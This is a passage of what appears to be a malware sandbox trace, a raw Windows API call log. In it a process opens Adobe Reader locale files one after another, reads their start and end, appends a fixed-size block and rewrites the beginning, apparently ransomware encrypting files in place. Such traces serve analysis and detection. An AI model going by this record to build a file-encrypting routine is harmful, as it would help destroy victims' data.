lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0085.938] WriteFile (in: hFile=0x1cc, lpBuffer=0x2865a58*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2865a58*, lpNumberOfBytesWritten=0x331f28c*=0x1000, lpOverlapped=0x0) returned 1 [0085.940] CloseHandle (hObject=0x1cc) returned 1 [0085.940] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\tr_TR\\DVA.TUR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\tr_tr\\dva.tur"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0085.941] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0085.941] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x4400 [0085.941] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0085.941] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.941] ReleaseMutex (hMutex=0x168) returned 1 [0085.941] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DVA.TUR", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0085.941] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DVA.TUR", cchWideChar=7, lpMultiByteStr=0x1f7ac0c, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DVA.TUR", lpUsedDefaultChar=0x0) returned 7 [0085.941] ReadFile (in: hFile=0x1cc, lpBuffer=0x2665398, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2665398*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.944] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x3400 [0085.945] ReadFile (in: hFile=0x1cc, lpBuffer=0x2665398, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2665398*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.945] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x3400 [0085.945] WriteFile (in: hFile=0x1cc, lpBuffer=0x2865a58*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2865a58*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0085.946] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0085.946] WriteFile (in: hFile=0x1cc, lpBuffer=0x2865a58*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2865a58*, lpNumberOfBytesWritten=0x331f28c*=0x1000, lpOverlapped=0x0) returned 1 [0085.946] CloseHandle (hObject=0x1cc) returned 1 [0085.946] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\tr_TR\\RdLang32.TUR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\tr_tr\\rdlang32.tur"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0085.947] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0085.947] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x140000 [0085.947] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0085.947] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.948] ReleaseMutex (hMutex=0x168) returned 1 [0085.948] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RdLang32.TUR", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0085.948] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RdLang32.TUR", cchWideChar=12, lpMultiByteStr=0x1f7320c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RdLang32.TUR", lpUsedDefaultChar=0x0) returned 12 [0085.948] ReadFile (in: hFile=0x1cc, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x331f278*=0xf000, lpOverlapped=0x0) returned 1 [0085.950] ReadFile (in: hFile=0x1cc, lpBuffer=0x25a0018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.952] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x13f000 [0085.952] ReadFile (in: hFile=0x1cc, lpBuffer=0x289f978, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x289f978*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.957] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x13f000 [0085.958] WriteFile (in: hFile=0x1cc, lpBuffer=0x2865a58*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2865a58*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0085.959] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0085.959] WriteFile (in: hFile=0x1cc, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x331f28c*=0xf000, lpOverlapped=0x0) returned 1 [0085.961] WriteFile (in: hFile=0x1cc, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x331f28c*=0x1000, lpOverlapped=0x0) returned 1 [0085.961] CloseHandle (hObject=0x1cc) returned 1 [0085.961] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\tr_TR\\Spelling.TUR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\tr_tr\\spelling.tur"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0085.962] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0085.962] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x2800 [0085.962] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0085.962] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.963] ReleaseMutex (hMutex=0x168) returned 1 [0085.963] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Spelling.TUR", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0085.963] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Spelling.TUR", cchWideChar=12, lpMultiByteStr=0x1f7366c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Spelling.TUR", lpUsedDefaultChar=0x0) returned 12 [0085.963] ReadFile (in: hFile=0x1cc, lpBuffer=0x2665398, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2665398*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0086.188] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x1800 [0086.192] ReadFile (in: hFile=0x1cc, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0086.192] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x1800 [0086.192] WriteFile (in: hFile=0x1cc, lpBuffer=0x26663c8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x26663c8*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0086.193] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0086.193] WriteFile (in: hFile=0x1cc, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x331f28c*=0x1000, lpOverlapped=0x0) returned 1 [0086.193] CloseHandle (hObject=0x1cc) returned 1 [0086.193] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\uk_UA\\Checkers.UKR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\uk_ua\\checkers.ukr"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0086.194] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0086.194] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x1e800 [0086.194] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0086.194] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0086.194] ReleaseMutex (hMutex=0x168) returned 1 [0086.195] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Checkers.UKR", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.196] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Checkers.UKR", cchWideChar=12, lpMultiByteStr=0x1f7352c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Checkers.UKR", lpUsedDefaultChar=0x0) returned 12 [0086.196] ReadFile (in: hFile=0x1cc, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x331f278*=0x4000, lpOverlapped=0x0) returned 1 [0086.221] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x1d800 [0086.221] ReadFile (in: hFile=0x1cc, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0087.278] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x1d800 [0087.279] WriteFile (in: hFile=0x1cc, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0087.279] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0087.279] WriteFile (in: hFile=0x1cc, lpBuffer=0x289e978*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x289e978*, lpNumberOfBytesWritten=0x331f28c*=0x4000, lpOverlapped=0x0) returned 1 [0087.279] CloseHandle (hObject=0x1cc) returned 1 [0087.279] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\uk_UA\\PDDom.UKR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\uk_ua\\pddom.ukr"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0087.280] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0087.280] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x2e00 [0087.280] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0087.280] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0087.280] ReleaseMutex (hMutex=0x168) returned 1 [0087.280] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDDom.UKR", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0087.280] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDDom.UKR", cchWideChar=9, lpMultiByteStr=0x1f735ec, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDDom.UKR", lpUsedDefaultChar=0x0) returned 9 [0087.281] ReadFile (in: hFile=0x1cc, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0088.265] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x1e00 [0088.265] ReadFile (in: hFile=0x1cc, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0088.333] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x1e00 [0088.334] WriteFile (in: hFile=0x1cc, lpBuffer=0x2865a58*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2865a58*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0088.335] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0088.335] WriteFile (in: hFile=0x1cc, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x331f28c*=0x1000, lpOverlapped=0x0) returned 1 [0088.335] CloseHandle (hObject=0x1cc) returned 1 [0088.335] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\uk_UA\\Services\\DEXShare.asfx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\uk_ua\\services\\dexshare.asfx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0088.336] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0088.336] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0xbab1 [0088.336] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0088.336] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0088.337] ReleaseMutex (hMutex=0x168) returned 1 [0088.337] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DEXShare.asfx", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0088.337] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DEXShare.asfx", cchWideChar=13, lpMultiByteStr=0x1f7340c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DEXShare.asfx", lpUsedDefaultChar=0x0) returned 13 [0088.337] ReadFile (in: hFile=0x1cc, lpBuffer=0x288ade8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x288ade8*, lpNumberOfBytesRead=0x331f278*=0x4000, lpOverlapped=0x0) returned 1 [0088.339] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0xaab1 [0088.425] ReadFile (in: hFile=0x1cc, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0088.709] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0xaab1 [0088.709] WriteFile (in: hFile=0x1cc, lpBuffer=0x2872fb8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2872fb8*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0088.710] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0088.710] WriteFile (in: hFile=0x1cc, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x331f28c*=0x4000, lpOverlapped=0x0) returned 1 [0088.711] CloseHandle (hObject=0x1cc) returned 1 [0088.711] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\Annots.CHS" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\zh_cn\\annots.chs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0088.712] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0088.712] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x4c000 [0088.712] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0088.712] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0088.712] ReleaseMutex (hMutex=0x168) returned 1 [0088.712] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Annots.CHS", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0088.712] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Annots.CHS", cchWideChar=10, lpMultiByteStr=0x1f7362c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Annots.CHS", lpUsedDefaultChar=0x0) returned 10 [0088.713] ReadFile (in: hFile=0x1cc, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x331f278*=0x8000, lpOverlapped=0x0) returned 1 [0088.778] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x4b000 [0088.778] ReadFile (in: hFile=0x1cc, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0088.878] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x4b000 [0089.126] WriteFile (in: hFile=0x1cc, lpBuffer=0x288ce18*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x288ce18*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0089.126] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0089.126] WriteFile (in: hFile=0x1cc, lpBuffer=0x2882db8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesWritten=0x331f28c*=0x8000, lpOverlapped=0x0) returned 1 [0089.126] CloseHandle (hObject=0x1cc) returned 1 [0089.127] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\makeaccessible.CHS" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\zh_cn\\makeaccessible.chs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0089.127] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0089.127] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x9400 [0089.127] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0089.127] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0089.127] ReleaseMutex (hMutex=0x168) returned 1 [0089.127] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="makeaccessible.CHS", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0089.127] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="makeaccessible.CHS", cchWideChar=18, lpMultiByteStr=0x1f88c44, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="makeaccessible.CHS", lpUsedDefaultChar=0x0) returned 18 [0089.127] ReadFile 